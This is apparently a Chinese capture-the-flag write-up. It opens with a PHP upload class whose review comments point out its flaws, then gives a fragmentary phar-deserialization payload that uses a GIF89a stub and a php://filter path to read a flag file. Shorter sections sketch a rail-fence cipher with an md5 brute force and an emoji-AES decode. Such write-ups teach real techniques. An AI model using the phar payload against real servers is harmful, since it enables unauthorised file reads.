upload,一道phar文件上传题目
// NOTE(review): the listing begins mid-constructor. The class header, the
// property declarations and the start of this first assignment are not on the
// page (presumably `$this->filename`, which check() and move() read; confirm).
filename = $_FILES["file"]["name"];
// Extension = the text after the last "." of the client-supplied file name.
$this->ext = end(explode(".", $_FILES["file"]["name"]));
// Reported upload size divided by 1024; no method shown here reads it.
$this->size = $_FILES["file"]["size"] / 1024;
$this->Valid_ext = array("gif", "jpeg", "jpg", "png"); // restricts the allowed extension types
}

/**
 * Public entry point: delegates to check() and returns its status message.
 */
public function start(){
    return $this->check();
}

/**
 * Validates the upload and hands it to move() when it passes.
 *
 * Only two things are tested: whether a file named $this->filename already
 * exists, and whether the extension is in $this->Valid_ext. The file content
 * is never inspected, so the allow-list establishes the name's suffix only,
 * not that the data is an image.
 *
 * NOTE(review): the existence test uses the bare name while move() writes
 * under "upload/", so the two paths differ unless the working directory is
 * the upload directory. Confirm against the deployment.
 */
private function check(){
    if(file_exists($this->filename)){
        return "Image already exsists";
    }elseif(!in_array($this->ext, $this->Valid_ext)){
        return "Only Image Can Be Uploaded";
    }else{
        return $this->move();
    }
}

/**
 * Moves the uploaded temp file to "upload/" followed by the client-supplied
 * name and returns the success message.
 *
 * The result of move_uploaded_file() is not checked, so the success message
 * is returned even when the move fails.
 *
 * NOTE(review): the client-supplied name is concatenated into the destination
 * unchanged; a server-generated name would remove that dependency on request
 * data.
 */
private function move(){
    move_uploaded_file($_FILES["file"]["tmp_name"], "upload/".$this->filename);
    return "Upload succsess!";
}

/**
 * Magic method that PHP invokes when an instance of this class is
 * unserialized; it echoes the contents of the path held in $this->filename.
 *
 * During unserialization the property carries whatever value the serialized
 * data contained, so this is a file-read sink for any code path that
 * unserializes data an outside party can influence.
 */
public function __wakeup(){
    echo file_get_contents($this->filename);
}
} // closes the preceding class, whose header is not on the page

/**
 * Reports whether the path named by the img_name query parameter exists.
 *
 * NOTE(review): the value goes from $_GET to file_exists() with no
 * restriction on directory or URL scheme. Before PHP 8.0, filesystem
 * functions given a phar:// path unserialize the archive's metadata, which
 * makes an unrestricted path here a deserialization entry point. Reducing the
 * value to basename() under the upload directory and rejecting anything that
 * contains a scheme closes that off.
 */
class check_img{
    // Path to test, copied unmodified from the request.
    public $img_name;

    /**
     * Stores $_GET['img_name'] as-is; no validation is applied.
     */
    public function __construct(){
        $this->img_name = $_GET['img_name'];
    }

    /**
     * Returns "Image exsists" when file_exists() accepts the stored path,
     * otherwise "Image not exsists".
     */
    public function img_check(){
        if(file_exists($this->img_name)){
            return "Image exsists";
        }else{
            return "Image not exsists";
        }
    }
}
public function __wakeup(){
echo file_get_contents($this->filename);
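}
从这一段可以看出:__wakeup 会在对象被反序列化时自动执行,并通过 file_get_contents 输出 $this->filename 指向的文件内容。phar 文件的元数据以序列化形式保存,读取 phar 时会触发反序列化(PHP 8.0 起,文件函数不再自动反序列化 phar 元数据),所以我们构造相应的 phar 文件就可以: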
filename="php://filter/read=convert.base64-encode/resource=../../../../flag";
$phar = new Phar('aaaaaaa.phar');
$phar->startBuffering();
$phar->setStub('GIF89a'.'');
$phar->setMetadata($a);
$phar->addFromString('test.txt', 'test');
$phar->stopBuffering();
?>
也就是试路径这一步麻烦一点
扫描目录扫到一个www.rar
g0at无意间发现了被打乱的flag:I{i?8Sms??Cd_1?T51??F_1?}
但是好像缺了不少东西,flag的md5值已经通过py交易得到了:88875458bdd87af5dd2e3c750e534741
I{i?8Sms??Cd_1?T51??F_1?}
因为题目提交的flag格式为ISCTF{},可以看出用的是栅栏密码
栏数为5。密文中的7个 ? 是缺失的字符,需要爆破,并用已知的md5值校验才能得到flag。本来直接套了7层循环,呃呃呃搜索空间太大跑不出来;后来看见了一个师傅写的脚本,思路真的想不到,但是它也有一个局限性,必须是数字才可以使用
下载文件需要解压,密码
根据提示进行爆破,前三个是KEY,后面五个字符为字母
解压出的文件都是emoji表情,然后进行emoji-aes解密
然后根据KEYISAES(即 KEY IS AES),可知密钥是AES
获得flag